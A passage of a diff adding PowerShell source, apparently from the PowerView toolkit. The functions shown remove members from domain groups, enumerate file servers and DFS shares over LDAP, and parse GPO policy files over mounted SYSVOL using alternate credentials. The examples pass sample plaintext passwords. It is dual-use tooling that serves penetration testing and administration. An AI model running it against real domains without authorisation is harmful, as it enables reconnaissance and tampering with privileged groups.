+Removes a domain user (or group)
from an existing domain group, assuming +appropriate permissions to do so. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified -GroupIdentity, +which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For +each entry in -Members, each member identity is similarly searched for and removed +from the group. + +.PARAMETER Identity + +A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to remove members from. + +.PARAMETER Members + +One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName +(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), +or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202). + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Remove-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' + +Removes harmj0y from 'Domain Admins' in the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Remove-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred + +Removes harmj0y from 'Domain Admins' in the current domain using the alternate credentials. 
+ +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('GroupName', 'GroupIdentity')] + [String] + $Identity, + + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('MemberIdentity', 'Member', 'DistinguishedName')] + [String[]] + $Members, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ContextArguments = @{ + 'Identity' = $Identity + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + + $GroupContext = Get-PrincipalContext @ContextArguments + + if ($GroupContext) { + try { + $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity) + } + catch { + Write-Warning "[Remove-DomainGroupMember] Error finding the group identity '$Identity' : $_" + } + } + } + + PROCESS { + if ($Group) { + ForEach ($Member in $Members) { + if ($Member -match '.+\\.+') { + $ContextArguments['Identity'] = $Member + $UserContext = Get-PrincipalContext @ContextArguments + if ($UserContext) { + $UserIdentity = $UserContext.Identity + } + } + else { + $UserContext = $GroupContext + $UserIdentity = $Member + } + Write-Verbose "[Remove-DomainGroupMember] Removing member '$Member' from group '$Identity'" + $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity) + $Group.Members.Remove($Member) + $Group.Save() + } + } + } +} + + +function Get-DomainFileServer { +<# +.SYNOPSIS + +Returns a list of 
servers likely functioning as file servers. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +.DESCRIPTION + +Returns a list of likely fileservers by searching for all users in Active Directory +with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying +the server names. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainFileServer + +Returns active file servers for the current domain. + +.EXAMPLE + +Get-DomainFileServer -Domain testing.local + +Returns active file servers for the 'testing.local' domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainFileServer -Credential $Cred + +.OUTPUTS + +String + +One or more strings representing file server names. 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [Alias('DomainName', 'Name')] + [String[]] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + function Split-Path { + # short internal helper to split UNC server paths + Param([String]$Path) + + if ($Path -and ($Path.split('\\').Count -ge 3)) { + $Temp = $Path.split('\\')[2] + if ($Temp -and ($Temp -ne '')) { + $Temp + } + } + } + + $SearcherArguments = @{ + 'LDAPFilter' = '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))' + 'Properties' = 'homedirectory,scriptpath,profilepath' + } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if 
($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + ForEach ($TargetDomain in $Domain) { + $SearcherArguments['Domain'] = $TargetDomain + $UserSearcher = Get-DomainSearcher @SearcherArguments + # get all results w/o the pipeline and uniquify them (I know it's not pretty) + $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique + } + } + else { + $UserSearcher = Get-DomainSearcher @SearcherArguments + $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique + } + } +} + + +function Get-DomainDFSShare { +<# +.SYNOPSIS + +Returns a list of all fault-tolerant distributed file systems +for the current (or specified) domains. + +Author: Ben Campbell (@meatballs__) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +.DESCRIPTION + +This function searches for all distributed file systems (either version +1, 2, or both depending on -Version X) by searching for domain objects +matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively +The server data is parsed appropriately and returned. + +.PARAMETER Domain + +Specifies the domains to use for the query, defaults to the current domain. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. 
+ +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainDFSShare + +Returns all distributed file system shares for the current domain. + +.EXAMPLE + +Get-DomainDFSShare -Domain testlab.local + +Returns all distributed file system shares for the 'testlab.local' domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainDFSShare -Credential $Cred + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +A custom PSObject describing the distributed file systems. 
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [Alias('DomainName', 'Name')] + [String[]] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateSet('All', 'V1', '1', 'V2', '2')] + [String] + $Version = 'All' + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + function Parse-Pkt { + [CmdletBinding()] + Param( + [Byte[]] + $Pkt + ) + + $bin = $Pkt + $blob_version = [bitconverter]::ToUInt32($bin[0..3],0) + 
$blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0) + $offset = 8 + #https://msdn.microsoft.com/en-us/library/cc227147.aspx + $object_list = @() + for($i=1; $i -le $blob_element_count; $i++){ + $blob_name_size_start = $offset + $blob_name_size_end = $offset + 1 + $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0) + + $blob_name_start = $blob_name_size_end + 1 + $blob_name_end = $blob_name_start + $blob_name_size - 1 + $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end]) + + $blob_data_size_start = $blob_name_end + 1 + $blob_data_size_end = $blob_data_size_start + 3 + $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0) + + $blob_data_start = $blob_data_size_end + 1 + $blob_data_end = $blob_data_start + $blob_data_size - 1 + $blob_data = $bin[$blob_data_start..$blob_data_end] + switch -wildcard ($blob_name) { + "\siteroot" { } + "\domainroot*" { + # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first... 
+ # DFSRootOrLinkIDBlob + $root_or_link_guid_start = 0 + $root_or_link_guid_end = 15 + $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end] + $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str + $prefix_size_start = $root_or_link_guid_end + 1 + $prefix_size_end = $prefix_size_start + 1 + $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0) + $prefix_start = $prefix_size_end + 1 + $prefix_end = $prefix_start + $prefix_size - 1 + $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end]) + + $short_prefix_size_start = $prefix_end + 1 + $short_prefix_size_end = $short_prefix_size_start + 1 + $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0) + $short_prefix_start = $short_prefix_size_end + 1 + $short_prefix_end = $short_prefix_start + $short_prefix_size - 1 + $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end]) + + $type_start = $short_prefix_end + 1 + $type_end = $type_start + 3 + $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0) + + $state_start = $type_end + 1 + $state_end = $state_start + 3 + $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0) + + $comment_size_start = $state_end + 1 + $comment_size_end = $comment_size_start + 1 + $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0) + $comment_start = $comment_size_end + 1 + $comment_end = $comment_start + $comment_size - 1 + if ($comment_size -gt 0) { + $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end]) + } + $prefix_timestamp_start = $comment_end + 1 + $prefix_timestamp_end = $prefix_timestamp_start + 7 + # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME + $prefix_timestamp = 
$blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime + $state_timestamp_start = $prefix_timestamp_end + 1 + $state_timestamp_end = $state_timestamp_start + 7 + $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end] + $comment_timestamp_start = $state_timestamp_end + 1 + $comment_timestamp_end = $comment_timestamp_start + 7 + $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end] + $version_start = $comment_timestamp_end + 1 + $version_end = $version_start + 3 + $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0) + + # Parse rest of DFSNamespaceRootOrLinkBlob here + $dfs_targetlist_blob_size_start = $version_end + 1 + $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3 + $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0) + + $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1 + $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1 + $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end] + $reserved_blob_size_start = $dfs_targetlist_blob_end + 1 + $reserved_blob_size_end = $reserved_blob_size_start + 3 + $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0) + + $reserved_blob_start = $reserved_blob_size_end + 1 + $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1 + $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end] + $referral_ttl_start = $reserved_blob_end + 1 + $referral_ttl_end = $referral_ttl_start + 3 + $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0) + + #Parse DFSTargetListBlob + $target_count_start = 0 + $target_count_end = $target_count_start + 3 + $target_count = 
[bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0) + $t_offset = $target_count_end + 1 + + for($j=1; $j -le $target_count; $j++){ + $target_entry_size_start = $t_offset + $target_entry_size_end = $target_entry_size_start + 3 + $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0) + $target_time_stamp_start = $target_entry_size_end + 1 + $target_time_stamp_end = $target_time_stamp_start + 7 + # FILETIME again or special if priority rank and priority class 0 + $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end] + $target_state_start = $target_time_stamp_end + 1 + $target_state_end = $target_state_start + 3 + $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0) + + $target_type_start = $target_state_end + 1 + $target_type_end = $target_type_start + 3 + $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0) + + $server_name_size_start = $target_type_end + 1 + $server_name_size_end = $server_name_size_start + 1 + $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0) + + $server_name_start = $server_name_size_end + 1 + $server_name_end = $server_name_start + $server_name_size - 1 + $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end]) + + $share_name_size_start = $server_name_end + 1 + $share_name_size_end = $share_name_size_start + 1 + $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0) + $share_name_start = $share_name_size_end + 1 + $share_name_end = $share_name_start + $share_name_size - 1 + $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end]) + + $target_list += 
"\\$server_name\$share_name" + $t_offset = $share_name_end + 1 + } + } + } + $offset = $blob_data_end + 1 + $dfs_pkt_properties = @{ + 'Name' = $blob_name + 'Prefix' = $prefix + 'TargetList' = $target_list + } + $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties + $prefix = $Null + $blob_name = $Null + $target_list = $Null + } + + $servers = @() + $object_list | ForEach-Object { + if ($_.TargetList) { + $_.TargetList | ForEach-Object { + $servers += $_.split('\')[2] + } + } + } + + $servers + } + + function Get-DomainDFSShareV1 { + [CmdletBinding()] + Param( + [String] + $Domain, + + [String] + $SearchBase, + + [String] + $Server, + + [String] + $SearchScope = 'Subtree', + + [Int] + $ResultPageSize = 200, + + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $DFSsearcher = Get-DomainSearcher @PSBoundParameters + + if ($DFSsearcher) { + $DFSshares = @() + $DFSsearcher.filter = '(&(objectClass=fTDfs))' + + try { + $Results = $DFSSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Properties = $_.Properties + $RemoteNames = $Properties.remoteservername + $Pkt = $Properties.pkt + + $DFSshares += $RemoteNames | ForEach-Object { + try { + if ( $_.Contains('\') ) { + New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split('\')[2]} + } + } + catch { + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error in parsing DFS share : $_" + } + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error disposing of the Results object: $_" + } + } + $DFSSearcher.dispose() + + if ($pkt -and $pkt[0]) { + Parse-Pkt $pkt[0] | ForEach-Object { + # If a folder doesn't have a redirection it will have a target like + # \\null\TestNameSpace\folder\.DFSFolderLink so we do 
actually want to match + # on 'null' rather than $Null + if ($_ -ne 'null') { + New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_} + } + } + } + } + catch { + Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV1 error : $_" + } + $DFSshares | Sort-Object -Unique -Property 'RemoteServerName' + } + } + + function Get-DomainDFSShareV2 { + [CmdletBinding()] + Param( + [String] + $Domain, + + [String] + $SearchBase, + + [String] + $Server, + + [String] + $SearchScope = 'Subtree', + + [Int] + $ResultPageSize = 200, + + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $DFSsearcher = Get-DomainSearcher @PSBoundParameters + + if ($DFSsearcher) { + $DFSshares = @() + $DFSsearcher.filter = '(&(objectClass=msDFS-Linkv2))' + $Null = $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2')) + + try { + $Results = $DFSSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Properties = $_.Properties + $target_list = $Properties.'msdfs-targetlistv2'[0] + $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)]) + $DFSshares += $xml.targets.ChildNodes | ForEach-Object { + try { + $Target = $_.InnerText + if ( $Target.Contains('\') ) { + $DFSroot = $Target.split('\')[3] + $ShareName = $Properties.'msdfs-linkpathv2'[0] + New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split('\')[2]} + } + } + catch { + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV2 error in parsing target : $_" + } + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_" + } + } + $DFSSearcher.dispose() + } + catch { + Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV2 error : $_" + } + 
$DFSshares | Sort-Object -Unique -Property 'RemoteServerName' + } + } + } + + PROCESS { + $DFSshares = @() + + if ($PSBoundParameters['Domain']) { + ForEach ($TargetDomain in $Domain) { + $SearcherArguments['Domain'] = $TargetDomain + if ($Version -match 'all|1') { + $DFSshares += Get-DomainDFSShareV1 @SearcherArguments + } + if ($Version -match 'all|2') { + $DFSshares += Get-DomainDFSShareV2 @SearcherArguments + } + } + } + else { + if ($Version -match 'all|1') { + $DFSshares += Get-DomainDFSShareV1 @SearcherArguments + } + if ($Version -match 'all|2') { + $DFSshares += Get-DomainDFSShareV2 @SearcherArguments + } + } + + $DFSshares | Sort-Object -Property ('RemoteServerName','Name') -Unique + } +} + + +######################################################## +# +# GPO related functions. +# +######################################################## + +function Get-GptTmpl { +<# +.SYNOPSIS + +Helper to parse a GptTmpl.inf policy file path into a hashtable. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, Get-IniContent + +.DESCRIPTION + +Parses a GptTmpl.inf into a custom hashtable using Get-IniContent. If a +GPO object is passed, GPOPATH\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf +is constructed and assumed to be the parse target. If -Credential is passed, +Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds, +the files are parsed, and the connection is destroyed later with Remove-RemoteConnection. + +.PARAMETER GptTmplPath + +Specifies the GptTmpl.inf file path name to parse. + +.PARAMETER OutputObject + +Switch. Output a custom PSObject instead of a hashtable. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. 
+ +.EXAMPLE + +Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + +Parse the default domain policy .inf for dev.testlab.local + +.EXAMPLE + +Get-DomainGPO testing | Get-GptTmpl + +Parse the GptTmpl.inf policy for the GPO with display name of 'testing'. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-GptTmpl -Credential $Cred -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + +Parse the default domain policy .inf for dev.testlab.local using alternate credentials. + +.OUTPUTS + +Hashtable + +Ouputs a hashtable representing the parsed GptTmpl.inf file. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param ( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('gpcfilesyspath', 'Path')] + [String] + $GptTmplPath, + + [Switch] + $OutputObject, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $MappedPaths = @{} + } + + PROCESS { + try { + if (($GptTmplPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $SysVolPath = "\\$((New-Object System.Uri($GptTmplPath)).Host)\SYSVOL" + if (-not $MappedPaths[$SysVolPath]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -Path $SysVolPath -Credential $Credential + $MappedPaths[$SysVolPath] = $True + } + } + + $TargetGptTmplPath = $GptTmplPath + if (-not $TargetGptTmplPath.EndsWith('.inf')) { + $TargetGptTmplPath += '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf' + } + + 
Write-Verbose "[Get-GptTmpl] Parsing GptTmplPath: $TargetGptTmplPath" + + if ($PSBoundParameters['OutputObject']) { + $Contents = Get-IniContent -Path $TargetGptTmplPath -OutputObject -ErrorAction Stop + if ($Contents) { + $Contents | Add-Member Noteproperty 'Path' $TargetGptTmplPath + $Contents + } + } + else { + $Contents = Get-IniContent -Path $TargetGptTmplPath -ErrorAction Stop + if ($Contents) { + $Contents['Path'] = $TargetGptTmplPath + $Contents + } + } + } + catch { + Write-Verbose "[Get-GptTmpl] Error parsing $TargetGptTmplPath : $_" + } + } + + END { + # remove the SYSVOL mappings + $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ } + } +} + + +function Get-GroupsXML { +<# +.SYNOPSIS + +Helper to parse a groups.xml file path into a custom object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertTo-SID + +.DESCRIPTION + +Parses a groups.xml into a custom object. If -Credential is passed, +Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds, +the files are parsed, and the connection is destroyed later with Remove-RemoteConnection. + +.PARAMETER GroupsXMLpath + +Specifies the groups.xml file path name to parse. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. 
+ +.OUTPUTS + +PowerView.GroupsXML +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GroupsXML')] + [CmdletBinding()] + Param ( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Path')] + [String] + $GroupsXMLPath, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $MappedPaths = @{} + } + + PROCESS { + try { + if (($GroupsXMLPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $SysVolPath = "\\$((New-Object System.Uri($GroupsXMLPath)).Host)\SYSVOL" + if (-not $MappedPaths[$SysVolPath]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -Path $SysVolPath -Credential $Credential + $MappedPaths[$SysVolPath] = $True + } + } + + [XML]$GroupsXMLcontent = Get-Content -Path $GroupsXMLPath -ErrorAction Stop + + # process all group properties in the XML + $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object { + + $Groupname = $_.Properties.groupName + + # extract the localgroup sid for memberof + $GroupSID = $_.Properties.groupSid + if (-not $GroupSID) { + if ($Groupname -match 'Administrators') { + $GroupSID = 'S-1-5-32-544' + } + elseif ($Groupname -match 'Remote Desktop') { + $GroupSID = 'S-1-5-32-555' + } + elseif ($Groupname -match 'Guests') { + $GroupSID = 'S-1-5-32-546' + } + else { + if ($PSBoundParameters['Credential']) { + $GroupSID = ConvertTo-SID -ObjectName $Groupname -Credential $Credential + } + else { + $GroupSID = ConvertTo-SID -ObjectName $Groupname + } + } + } + + # extract out members added to this group + $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object { + if ($_.sid) { $_.sid } + else { $_.name } + } + + if ($Members) { + # extract out any/all 
